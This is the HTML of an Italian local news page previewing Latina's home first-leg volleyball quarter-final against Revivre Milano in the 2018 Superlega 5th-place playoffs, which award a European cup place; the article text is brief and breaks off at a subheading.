L144.88,39.2685714 L154.811429,39.2685714 Z M153.302857,30.7828571 L146.388571,30.7828571 L148.337143,19.7828571 C149.028571,15.8857143 149.72,11.7371429 149.72,11.6742857 L149.971429,11.6742857 C150.034286,11.7371429 150.662857,15.9485714 151.354286,19.8457143 L153.302857,30.7828571 Z" class="logo-edition"></path>
</svg>
      </div>
      
      <a href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#" class="btn close-btn"><svg class="icon medium"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#close-icon"></use></svg> </a>
    </div>
    
    
    
    
    <ul class="u-unstyled nav-items-list">
      
            
        <li class="nav-item"><a href="/" class="current-parent link">Homepage</a></li>        
        <li class="nav-item "><a href="/eventi/" class="link">Cosa fare in città</a></li>
        <li class="nav-item "><a href="/cronaca/" class="link" title="Cronaca Latina">Cronaca</a></li>
        <li class="nav-item "><a href="/politica/" class="link">Politica</a></li>
        <li class="nav-item current"><a href="/sport/" class="link">Sport</a></li>
        <li class="nav-item "><a href="/economia/" class="link">Economia e Lavoro</a></li>
        <li class="nav-item "><a href="/green/" class="link">Smart City</a></li>
        <li class="nav-item "><a href="/social/segnalazioni/" class="link">Segnalazioni</a></li>
        <li class="nav-item "><a href="/foto/" class="link">Foto</a></li>
        <li class="nav-item "><a href="/video/" class="link">Video</a></li>
        
    
      
            
              <li class="nav-item has-children">
          <a href="" class="link">Zone</a>
          <div class="nav-children is-hidden">
            <a href="" class="link go-back">Menu</a>
            
  

  
 <!-- INIZIALI -->
 <ul class="u-unstyled alph-list">
    

    
                  <li class="alph-item"><a href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#alph-group-a">A</a></li>
                         <li class="alph-item"><a href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#alph-group-b">B</a></li>
                         <li class="alph-item"><a href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#alph-group-c">C</a></li>
                       <li class="alph-item">D</li>
                         <li class="alph-item"><a href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#alph-group-e">E</a></li>
                         <li class="alph-item"><a href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#alph-group-f">F</a></li>
                         <li class="alph-item"><a href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#alph-group-g">G</a></li>
                         <li class="alph-item"><a href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#alph-group-i">I</a></li>
                       <li class="alph-item">J</li>
                         <li class="alph-item"><a href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#alph-group-l">L</a></li>
                         <li class="alph-item"><a href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#alph-group-m">M</a></li>
                         <li class="alph-item"><a href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#alph-group-n">N</a></li>
                       <li class="alph-item">O</li>
                         <li class="alph-item"><a href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#alph-group-p">P</a></li>
                         <li class="alph-item"><a href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#alph-group-q">Q</a></li>
                         <li class="alph-item"><a href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#alph-group-r">R</a></li>
                         <li class="alph-item"><a href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#alph-group-s">S</a></li>
                         <li class="alph-item"><a href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#alph-group-t">T</a></li>
                       <li class="alph-item">U</li>
                         <li class="alph-item"><a href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#alph-group-v">V</a></li>
                       <li class="alph-item">Z</li>
               
 </ul>
    
 <div class="alph-groups-container">
    
        
        
    <ul class="u-unstyled alph-group">
      <li id="alph-group-a"><h5 class="index-alphabetic-list">A</h5></li>
      
            
      <li><h5>ZONA</h5></li>
      
                <li>
          <a href="/notizie/agora/">Agora</a>
        </li>
              
            
      <li><h5>COMUNE</h5></li>
      
                <li>
          <a href="/notizie/aprilia/">Aprilia</a>
        </li>
              
            
    </ul>
        
    <ul class="u-unstyled alph-group">
      <li id="alph-group-b"><h5 class="index-alphabetic-list">B</h5></li>
      
            
      <li><h5>COMUNE</h5></li>
      
                <li>
          <a href="/notizie/bassiano/">Bassiano</a>
        </li>
              
            
      <li><h5>ZONA</h5></li>
      
                <li>
          <a href="/notizie/borgo-bainsizza/">Borgo Bainsizza</a>
        </li>
                <li>
          <a href="/notizie/borgo-carso/">Borgo Carso</a>
        </li>
                <li>
          <a href="/notizie/borgo-faiti/">Borgo Faiti</a>
        </li>
                <li>
          <a href="/notizie/borgo-grappa/">Borgo Grappa</a>
        </li>
                <li>
          <a href="/notizie/borgo-montello/">Borgo Montello</a>
        </li>
                <li>
          <a href="/notizie/borgo-piave/">Borgo Piave</a>
        </li>
                <li>
          <a href="/notizie/borgo-podgora/">Borgo Podgora</a>
        </li>
                <li>
          <a href="/notizie/borgo-sabotino/">Borgo Sabotino</a>
        </li>
                <li>
          <a href="/notizie/borgo-san-michele/">Borgo San Michele</a>
        </li>
                <li>
          <a href="/notizie/borgo-santa-maria/">Borgo Santa Maria</a>
        </li>
              
            
    </ul>
        
    <ul class="u-unstyled alph-group">
      <li id="alph-group-c"><h5 class="index-alphabetic-list">C</h5></li>
      
            
      <li><h5>ZONA</h5></li>
      
                <li>
          <a href="/notizie/campo-boario/">Campo Boario</a>
        </li>
                <li>
          <a href="/notizie/centro/">Centro</a>
        </li>
              
            
      <li><h5>COMUNE</h5></li>
      
                <li>
          <a href="/notizie/campodimele/">Campodimele</a>
        </li>
                <li>
          <a href="/notizie/castelforte/">Castelforte</a>
        </li>
                <li>
          <a href="/notizie/cisterna-di-latina/">Cisterna di Latina</a>
        </li>
                <li>
          <a href="/notizie/cori/">Cori</a>
        </li>
              
            
    </ul>
        
    <ul class="u-unstyled alph-group">
      <li id="alph-group-e"><h5 class="index-alphabetic-list">E</h5></li>
      
            
      <li><h5>ZONA</h5></li>
      
                <li>
          <a href="/notizie/europa/">Europa</a>
        </li>
              
            
    </ul>
        
    <ul class="u-unstyled alph-group">
      <li id="alph-group-f"><h5 class="index-alphabetic-list">F</h5></li>
      
            
      <li><h5>COMUNE</h5></li>
      
                <li>
          <a href="/notizie/fondi/">Fondi</a>
        </li>
                <li>
          <a href="/notizie/formia/">Formia</a>
        </li>
              
            
    </ul>
        
    <ul class="u-unstyled alph-group">
      <li id="alph-group-g"><h5 class="index-alphabetic-list">G</h5></li>
      
            
      <li><h5>COMUNE</h5></li>
      
                <li>
          <a href="/notizie/gaeta/">Gaeta</a>
        </li>
              
            
      <li><h5>ZONA</h5></li>
      
                <li>
          <a href="/notizie/gionchetto/">Gionchetto</a>
        </li>
                <li>
          <a href="/notizie/goretti/">Goretti</a>
        </li>
              
            
    </ul>
        
    <ul class="u-unstyled alph-group">
      <li id="alph-group-i"><h5 class="index-alphabetic-list">I</h5></li>
      
            
      <li><h5>ZONA</h5></li>
      
                <li>
          <a href="/notizie/isonzo/">Isonzo</a>
        </li>
              
            
      <li><h5>COMUNE</h5></li>
      
                <li>
          <a href="/notizie/itri/">Itri</a>
        </li>
              
            
    </ul>
        
    <ul class="u-unstyled alph-group">
      <li id="alph-group-l"><h5 class="index-alphabetic-list">L</h5></li>
      
            
      <li><h5>ZONA</h5></li>
      
                <li>
          <a href="/notizie/latina-lido/">Latina Lido</a>
        </li>
                <li>
          <a href="/notizie/latina-scalo/">Latina Scalo</a>
        </li>
              
            
      <li><h5>COMUNE</h5></li>
      
                <li>
          <a href="/notizie/lenola/">Lenola</a>
        </li>
              
            
    </ul>
        
    <ul class="u-unstyled alph-group">
      <li id="alph-group-m"><h5 class="index-alphabetic-list">M</h5></li>
      
            
      <li><h5>COMUNE</h5></li>
      
                <li>
          <a href="/notizie/maenza/">Maenza</a>
        </li>
                <li>
          <a href="/notizie/minturno/">Minturno</a>
        </li>
                <li>
          <a href="/notizie/monte-san-biagio/">Monte San Biagio</a>
        </li>
              
            
    </ul>
        
    <ul class="u-unstyled alph-group">
      <li id="alph-group-n"><h5 class="index-alphabetic-list">N</h5></li>
      
            
      <li><h5>COMUNE</h5></li>
      
                <li>
          <a href="/notizie/norma/">Norma</a>
        </li>
              
            
    </ul>
        
    <ul class="u-unstyled alph-group">
      <li id="alph-group-p"><h5 class="index-alphabetic-list">P</h5></li>
      
            
      <li><h5>ZONA</h5></li>
      
                <li>
          <a href="/notizie/pantanaccio/">Pantanaccio</a>
        </li>
                <li>
          <a href="/notizie/persicara/">Persicara</a>
        </li>
                <li>
          <a href="/notizie/piazza-aldo-moro/">Piazza Aldo Moro</a>
        </li>
                <li>
          <a href="/notizie/piccarello/">Piccarello</a>
        </li>
                <li>
          <a href="/notizie/prampolini/">Prampolini</a>
        </li>
              
            
      <li><h5>COMUNE</h5></li>
      
                <li>
          <a href="/notizie/pontinia/">Pontinia</a>
        </li>
                <li>
          <a href="/notizie/ponza/">Ponza</a>
        </li>
                <li>
          <a href="/notizie/priverno/">Priverno</a>
        </li>
                <li>
          <a href="/notizie/prossedi/">Prossedi</a>
        </li>
              
            
    </ul>
        
    <ul class="u-unstyled alph-group">
      <li id="alph-group-q"><h5 class="index-alphabetic-list">Q</h5></li>
      
            
      <li><h5>ZONA</h5></li>
      
                <li>
          <a href="/notizie/q4/">Q4</a>
        </li>
                <li>
          <a href="/notizie/q5/">Q5</a>
        </li>
              
            
    </ul>
        
    <ul class="u-unstyled alph-group">
      <li id="alph-group-r"><h5 class="index-alphabetic-list">R</h5></li>
      
            
      <li><h5>COMUNE</h5></li>
      
                <li>
          <a href="/notizie/rocca-massima/">Rocca Massima</a>
        </li>
                <li>
          <a href="/notizie/roccagorga/">Roccagorga</a>
        </li>
                <li>
          <a href="/notizie/roccasecca-dei-volsci/">Roccasecca dei Volsci</a>
        </li>
              
            
    </ul>
        
    <ul class="u-unstyled alph-group">
      <li id="alph-group-s"><h5 class="index-alphabetic-list">S</h5></li>
      
            
      <li><h5>COMUNE</h5></li>
      
                <li>
          <a href="/notizie/sabaudia/">Sabaudia</a>
        </li>
                <li>
          <a href="/notizie/san-felice-circeo/">San Felice Circeo</a>
        </li>
                <li>
          <a href="/notizie/santi-cosma-e-damiano/">Santi Cosma e Damiano</a>
        </li>
                <li>
          <a href="/notizie/sermoneta/">Sermoneta</a>
        </li>
                <li>
          <a href="/notizie/sezze/">Sezze</a>
        </li>
                <li>
          <a href="/notizie/sonnino/">Sonnino</a>
        </li>
                <li>
          <a href="/notizie/sperlonga/">Sperlonga</a>
        </li>
                <li>
          <a href="/notizie/spigno-saturnia/">Spigno Saturnia</a>
        </li>
              
            
      <li><h5>ZONA</h5></li>
      
                <li>
          <a href="/notizie/santa-rita/">Santa Rita</a>
        </li>
              
            
    </ul>
        
    <ul class="u-unstyled alph-group">
      <li id="alph-group-t"><h5 class="index-alphabetic-list">T</h5></li>
      
            
      <li><h5>COMUNE</h5></li>
      
                <li>
          <a href="/notizie/terracina/">Terracina</a>
        </li>
              
            
      <li><h5>ZONA</h5></li>
      
                <li>
          <a href="/notizie/torre-la-felce/">Torre la Felce</a>
        </li>
              
            
    </ul>
        
    <ul class="u-unstyled alph-group">
      <li id="alph-group-v"><h5 class="index-alphabetic-list">V</h5></li>
      
            
      <li><h5>COMUNE</h5></li>
      
                <li>
          <a href="/notizie/ventotene/">Ventotene</a>
        </li>
              
            
      <li><h5>ZONA</h5></li>
      
                <li>
          <a href="/notizie/via-lido/">Via Lido</a>
        </li>
                <li>
          <a href="/notizie/villaggio-trieste/">Villaggio Trieste</a>
        </li>
              
            
    </ul>
          
 </div>


  
          </div>
        </li>
          </ul>
  </nav>
  
  <div class="content-blocker" style="-webkit-user-select: none; -webkit-user-drag: none;"></div>
  
   
  
</header>

<nav class="nav-tabs">
  <ul class="u-unstyled inline-list">
    <li class="tab current"><a href="/notizie/tutte/">Notizie</a></li>
    <li class="tab "><a href="/eventi/">Cosa fare in Città</a></li>
  </ul>
</nav>
                  
      





      
      <div class="page">
                  
                            


 <div data-revive-format="980x30" class="slot-980x30" style="text-align:center;"><div align="center">

<script type="text/revive-ad" data-revive-ad="1135" data-revive-format="980x30" data-revive-target=""></script><noscript><a href='http://adv.strategy.it/www/delivery/ck.php?n=a8ac6772&cb=157535545' target='_blank'><img src='http://adv.strategy.it/www/delivery/avw.php?zoneid=1135&cb=157535545&n=a8ac6772' border='0' alt='' /></a></noscript>
</div>
</div>
  
                       
                          
        

<main class="main-content">
  <article class="entry" role="main">


    <header class="entry-header">

      <div class="entry-labels">
        <span class="entry-label category-label theme-color"><a class="link" href="/sport/">Sport</a></span>

        
        
      </div>

      <h1 class="entry-title" data-amp="amp-title">Pallavolo, playoff 5&deg; posto: Latina ospita Milano nella gara d&rsquo;andata dei quarti</h1>

      <p class="summary entry-summary" data-amp="amp-abstract">La Taiwan Excellence affronta la squadra guidata da Andrea Giani nel torneo che mette in palio un posto nelle Coppe Europee della prossima stagione. Il ritorno l’8 aprile</p>



    </header>

    <section class="entry-content">

      <div class="entry-meta has-author">

        <div class="meta-byline">
          



     
  <div class="author">
      <figure class="author-photo">
         <img class="avatar avatar-lg" src="http://3.citynews.stgy.ovh/~shared/images/v2015/avatars/citynews-latinatoday.png" />
      </figure>
      
      <span class="author-name">
    Redazione      </span>
    </div>

           <time class="datestamp" data-timestamp="p6fw20">
            31 marzo 2018 07:18
          </time>
        </div>

        <div class="meta-social">

          



  <ul class="u-unstyled inline-list social-share">
            
          <li id="Sharrre_facebook_ea69ff5937c697ffdc65333057569f824bb86d2f"></li>
        
    
    
          <li>
        <a onclick="window.ga && ga( 'send', 'event', 'Share', 'Twitter', location.href ); window.ga && ga( 'send', 'social', 'Twitter', 'share', location.href );" target="_blank" rel="nofollow" href="https://twitter.com/intent/tweet?text=Pallavolo%2C+playoff+5%C2%B0+posto%3A+Latina+ospita+Milano+nella+gara+d%E2%80%99andata+dei+quarti&url=http%3A%2F%2Fwww.latinatoday.it%2Fsport%2Fpallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html" class="btn btn-sm share-btn twitter-share-btn"><svg class="icon medium twitter-icon"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#twitter-icon"></use></svg></a>
      </li>
      
    
    
      
    
    
        <li class="visible-xs-inline-block">
      <a rel="nofollow" target="_blank" class="btn btn-sm share-btn whatsapp-share-btn" onclick="window.ga && ga( 'send', 'event', 'Share', 'WhatsApp', location.href ); window.ga && ga( 'send', 'social', 'WhatsApp', 'share', location.href );" href="whatsapp://send?text=Pallavolo%2C%20playoff%205%C2%B0%20posto%3A%20Latina%20ospita%20Milano%20nella%20gara%20d%E2%80%99andata%20dei%20quarti%20%40%20http%3A%2F%2Fwww.latinatoday.it%2Fsport%2Fpallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html">
        <svg class="icon medium whatsapp-icon">
          <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#whatsapp-icon"></use>
        </svg>
      </a>
    </li>
    
        
          <li>
        <a rel="nofollow" target="_blank" class="btn btn-sm share-btn telegram-share-btn" onclick="window.ga && ga( 'send', 'event', 'Share', 'Telegram', location.href ); window.ga && ga( 'send', 'social', 'Telegram', 'share', location.href );" href="https://telegram.me/share/url?url=http%3A%2F%2Fwww.latinatoday.it%2Fsport%2Fpallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html&text=Pallavolo%2C+playoff+5%C2%B0+posto%3A+Latina+ospita+Milano+nella+gara+d%E2%80%99andata+dei+quarti">
          <svg class="icon medium telegram-icon">
            <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#telegram-icon"></use>
          </svg>
        </a>
      </li>
    
    
        <li class="hidden-xs hidden-sm">
      <a class="btn btn-sm default-btn share-btn email-share-btn" target="_blank" rel="nofollow" onclick="window.ga && ga( 'send', 'event', 'Share', 'E-Mail', location.href ); window.ga && ga( 'send', 'social', 'E-Mail', 'share', location.href );" href="/form/contacts/send-to-friends/link/NQdBbyBg4FzSbHaHsh5TWUpGqxFssGhvPh-cyXOr2v_t9lGUJIG3kccj8UwqxE0D-apfAL8l9MGhBRNZPNQzhC3qddPN0YjCKQB43der86pEbKnt4ZkkS0HrQh3BwjirlmLRkv9TISgNyuVY7qEJUk8HSwvrrs4wtyNFMO7IZPB7l8PUyRUAEVlmssTKJpddLIehGfe59S_f1jCI5P8s5QQS79_Alrf6Z3a1wMvbuKoWE42aLnVsc_a-epNb5SCSY_4P6dLXCHODRepsF-1Gi95RLgmOKGNb83BWlb">
        <svg class="icon medium email-icon">
          <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#email-icon">
          </use>
        </svg>
      </a>
    </li>
      </ul>
 
 
<script type="text/javascript">/*<![CDATA[*/

  window.dl && dl
  (
    [
      "http:\/\/3.citynews.stgy.ovh\/~shared\/scripts\/bootstrap\/blackstone.js",
      "http:\/\/1.citynews.stgy.ovh\/~shared\/scripts\/jquery\/jquery.sharre.js"    ],
      
    
    function( )
    {
      window.iSharrreTotalCount_ea69ff5937c697ffdc65333057569f824bb86d2f = 0;
      window.fSharrreTotalCount_ea69ff5937c697ffdc65333057569f824bb86d2f = function( iCount )
      {
        window.iSharrreTotalCount_ea69ff5937c697ffdc65333057569f824bb86d2f += iCount;
       
        if ( window.iSharrreTotalCount_ea69ff5937c697ffdc65333057569f824bb86d2f > 0 )
        {
          $('#sharrre-social-counter_ea69ff5937c697ffdc65333057569f824bb86d2f').text( window.iSharrreTotalCount_ea69ff5937c697ffdc65333057569f824bb86d2f );
          $('#sharrre-box-social-counter_ea69ff5937c697ffdc65333057569f824bb86d2f').fadeIn( 'fast' );
        }
        
        else
         $('#sharrre-box-social-counter_ea69ff5937c697ffdc65333057569f824bb86d2f').fadeOut( 'fast' );
     };
    
    
      window.$ && $.fn.sharrre && $('#Sharrre_facebook_ea69ff5937c697ffdc65333057569f824bb86d2f').sharrre
      ({
        share:          { facebook: true },
        url:            location.protocol + '//' + location.host + location.pathname,
        
        template:       '<span class="btn btn-sm share-btn facebook-share-btn"><svg class="icon medium facebook-icon"><title>{total}</title><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#facebook-icon"></use></svg></span>',
        enableHover:    false,
        enableTracking: false,
        
        click:          function( api, options )
        {
          api.simulateClick( );
          api.openPopup( 'facebook' );
          
          window.ga && ga( 'send', 'event', 'Share', 'Facebook', location.href );
          window.ga && ga( 'send', 'social', 'Facebook', 'share', location.href );
        }
       
                   , render: function( ){ window.fSharrreTotalCount_ea69ff5937c697ffdc65333057569f824bb86d2f( this.total ); }
                  
        });
          
    }
  );
 
/*]]>*/</script>

  
    <div class="social-counter" id="sharrre-box-social-counter_ea69ff5937c697ffdc65333057569f824bb86d2f" style="display:none;">
    <span class="number" id="sharrre-social-counter_ea69ff5937c697ffdc65333057569f824bb86d2f"></span>
    <svg class="icon share">
      <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#share"></use></svg>
    <span class="counter-label">Condivisioni</span>
  </div>
  


          

        </div>

      </div>



      
        <div class="content-secondary-column hidden-xs">
          <div class="module most-read theme-border bottom-margin">
  <h5 class="module-title">I più letti di oggi</h5>
  <ul class="u-unstyled u-bordered l-list">

  
    <li class="l-list-item item-span-1">

      <article class="story">
      
        <figure class="story-media media-xs">

          <div class="number">
            1          </div>

          <a href="/sport/latina-sff-atletico-2-0.html">
            <picture>
              <source srcset="http://2.citynews-latinatoday.stgy.ovh/~media/horizontal-mid/13600479972408/iadaresta-3.jpg" media="(min-width: 62.5em)">
              <img srcset="http://3.citynews-latinatoday.stgy.ovh/~media/square-low/13600479972408/iadaresta-3.jpg" alt="Iadaresta-Natale, allo scadere il Latina riesce a domare l&#039;Sff Atletico">
            </picture>
          </a>

        </figure>

        
        <h4 class="story-heading heading-xs">
          <a href="/sport/latina-sff-atletico-2-0.html" class="link">Iadaresta-Natale, allo scadere il Latina riesce a domare l&#039;Sff Atletico</a>
        </h4>

      </article>
    </li>

  
    <li class="l-list-item item-span-1">

      <article class="story">
      
        <figure class="story-media media-xs">

          <div class="number">
            2          </div>

          <a href="/sport/basket-bertram-tortona-benacquista-latina-30-marzo-2018.html">
            <picture>
              <source srcset="http://2.citynews-latinatoday.stgy.ovh/~media/horizontal-mid/18491262471681/basket_benacquista_raymond_2017_18-2.jpg" media="(min-width: 62.5em)">
              <img srcset="http://1.citynews-latinatoday.stgy.ovh/~media/square-low/18491262471681/basket_benacquista_raymond_2017_18-2.jpg" alt="Basket, Benacquista punta al poker: stasera la gara in trasferta contro Tortona">
            </picture>
          </a>

        </figure>

        
        <h4 class="story-heading heading-xs">
          <a href="/sport/basket-bertram-tortona-benacquista-latina-30-marzo-2018.html" class="link">Basket, Benacquista punta al poker: stasera la gara in trasferta contro Tortona</a>
        </h4>

      </article>
    </li>

  
    <li class="l-list-item item-span-1">

      <article class="story">
      
        <figure class="story-media media-xs">

          <div class="number">
            3          </div>

          <a href="/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html">
            <picture>
              <source srcset="http://2.citynews-latinatoday.stgy.ovh/~media/horizontal-mid/35550976407611/pallavolo_latina_milano_2017_18-2-2.jpg" media="(min-width: 62.5em)">
              <img srcset="http://1.citynews-latinatoday.stgy.ovh/~media/square-low/35550976407611/pallavolo_latina_milano_2017_18-2-2.jpg" alt="Pallavolo, playoff 5&deg; posto: Latina ospita Milano nella gara d&rsquo;andata dei quarti">
            </picture>
          </a>

        </figure>

        
        <h4 class="story-heading heading-xs">
          <a href="/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html" class="link">Pallavolo, playoff 5&deg; posto: Latina ospita Milano nella gara d&rsquo;andata dei quarti</a>
        </h4>

      </article>
    </li>

  
  </ul>
</div>


          <div class="slots">
                             


 <div data-revive-format="300x250_naz" class="slot slot-300x250_naz" style="text-align:center;">
<script type="text/revive-ad" data-revive-ad="1981" data-revive-format="300x250_naz" data-revive-target=""></script><noscript><a href='http://adv.strategy.it/www/delivery/ck.php?n=ad928329&cb=376859529' target='_blank'><img src='http://adv.strategy.it/www/delivery/avw.php?zoneid=1981&cb=376859529&n=ad928329' border='0' alt='' /></a></noscript>
</div>
 
               


 <div data-revive-format="300x250_loc" class="slot slot-300x250_loc" style="text-align:center;">
<script type="text/revive-ad" data-revive-ad="681" data-revive-format="300x250_loc" data-revive-target=""></script><noscript><a href='http://adv.strategy.it/www/delivery/ck.php?n=ae23cf9d&cb=320261547' target='_blank'><img src='http://adv.strategy.it/www/delivery/avw.php?zoneid=681&cb=320261547&n=ae23cf9d' border='0' alt='' /></a></noscript>
</div>
 
               


 <div data-revive-format="halfpage" class="slot slot-halfpage" style="text-align:center;"><script type="text/revive-ad" data-revive-ad="2600" data-revive-format="halfpage" data-revive-target=""></script><noscript><a href='http://adv.strategy.it/www/delivery/ck.php?n=ad93dad1&amp;cb=2081975557' target='_blank'><img src='http://adv.strategy.it/www/delivery/avw.php?zoneid=2600&amp;cb=2081975557&amp;n=ad93dad1' border='0' alt='' /></a></noscript></div>
 
            

                
<div data-behaviour="sticky" data-offset-top="0" data-comparer=".content-main-column-inner" data-container=".content-secondary-column"></div>
<br><br>                


 <div data-revive-format="300x250_loc2" class="slot slot-300x250_loc2" style="text-align:center;"><div align="center">

<script type="text/revive-ad" data-revive-ad="1059" data-revive-format="300x250_loc2" data-revive-target=""></script><noscript><a href='http://adv.strategy.it/www/delivery/ck.php?n=a4929d1c&amp;cb=1356769641' target='_blank'><img src='http://adv.strategy.it/www/delivery/avw.php?zoneid=1059&amp;cb=1356769641&amp;n=a4929d1c' border='0' alt='' /></a></noscript>

</div></div>
 
                        </div>
       </div>
      

      <div class="content-main-column">

       <div class="content-main-column-inner">
        
                        <figure class="entry-media">
                <a href="http://1.citynews-latinatoday.stgy.ovh/~media/original-hi/35550976407611/pallavolo_latina_milano_2017_18-2-2.jpg" class="fancybox" onclick="return false;" title="">
                  <picture>
                    <source srcset="http://2.citynews-latinatoday.stgy.ovh/~media/horizontal-mid/35550976407611/pallavolo_latina_milano_2017_18-2-2.jpg" media="(min-width: 30em)">
                    <img srcset="http://1.citynews-latinatoday.stgy.ovh/~media/horizontal-low/35550976407611/pallavolo_latina_milano_2017_18-2-2.jpg" alt="">
                  </picture>
                </a>

                
              </figure>
                  

         
         
         <div class="entry-content-body" data-amp="amp-text">
                      
                      

<div class="related-stories inner visible-md visible-lg">
  <h5 class="theme-element-bg">Approfondimenti</h5>
        
  <ul class="u-unstyled u-bordered">
    
    <li>
      <article class="story">
                <figure class="story-media">
          <a href="/sport/pallavolo-revivre-milano-taiwan-excellence-latina-2-3-tabellini.html">
            
            
           <script type="text/async-html" data-async-html-on-viewport="1">&lt;img src="http://2.citynews-latinatoday.stgy.ovh/~media/horizontal-low/41205538949740/pallavolo_latina_ishikawa_2017_18.jpg" alt="Pallavolo, la Taiwan Excellence chiude la stagione regolare con la vittoria a Milano"&gt;</script>              
          
          </a>
        </figure>
                <h4 class="story-heading"><a href="/sport/pallavolo-revivre-milano-taiwan-excellence-latina-2-3-tabellini.html" class="current link">Pallavolo, la Taiwan Excellence chiude la stagione regolare con la vittoria a Milano</a></h4>
        <time class="timestamp"> 4 marzo 2018</time>
      </article>
    </li>
    
    <li>
      <article class="story">
                <figure class="story-media">
          <a href="/sport/pallavolo-playoff-challenge-castellana-taiwan-excellence-latina-0-3-tabellini.html">
            
            
           <script type="text/async-html" data-async-html-on-viewport="1">&lt;img src="http://2.citynews-latinatoday.stgy.ovh/~media/horizontal-low/54553625219752/pallavolo_latina_castellana_2017_18-4.jpg" alt="Pallavolo, playoff Challenge: Taiwan Excellence supera Castellana e vola ai quarti"&gt;</script>              
          
          </a>
        </figure>
                <h4 class="story-heading"><a href="/sport/pallavolo-playoff-challenge-castellana-taiwan-excellence-latina-0-3-tabellini.html" class="current link">Pallavolo, playoff Challenge: Taiwan Excellence supera Castellana e vola ai quarti</a></h4>
        <time class="timestamp">22 marzo 2018</time>
      </article>
    </li>
    
    <li>
      <article class="story">
                <figure class="story-media">
          <a href="/sport/pallavol-playoff-5-posto-taiwan-excellence-revivre-milano.html">
            
            
           <script type="text/async-html" data-async-html-on-viewport="1">&lt;img src="http://3.citynews-latinatoday.stgy.ovh/~media/horizontal-low/57593434549923/pallavolo_latina_castellana_2017_18-2.jpg" alt="Pallavolo, playoff 5&amp;deg; posto: la Revivre Milano di Giani l&amp;rsquo;avversaria di Latina ai quarti"&gt;</script>              
          
          </a>
        </figure>
                <h4 class="story-heading"><a href="/sport/pallavol-playoff-5-posto-taiwan-excellence-revivre-milano.html" class="current link">Pallavolo, playoff 5&deg; posto: la Revivre Milano di Giani l&rsquo;avversaria di Latina ai quarti</a></h4>
        <time class="timestamp">26 marzo 2018</time>
      </article>
    </li>
      </ul>
  
</div>
          


                     

           <p><strong>Quarti di finale</strong> dei <strong>playoff 5&deg; posto Superlega UnipolSai</strong> per la <strong>Taiwan Excellence</strong> che stasera alle 20.30 per la gara dei quarti al PalaBianchini ospita la<strong> Revivre Milano.&nbsp;</strong></p>

<p>Il torneo mette in palio <strong>un posto nelle Coppe Europee</strong> della prossima stagione e la gara di ritorno &egrave; in programma a Busto Arsizio l&rsquo;8 aprile. La formula di questo torneo &egrave; a eliminazione diretta, i quarti e le semifinali si disputano con la formula andata, ritorno ed eventuale golden set (se i punti conquistati nelle due gare sono gli stessi). Oltre a Latina-Milano, si giocano Vibo-Verona, Padova-Ravenna e Monza-Piacenza.</p>

<h2>In casa Revivre Milano</h2>

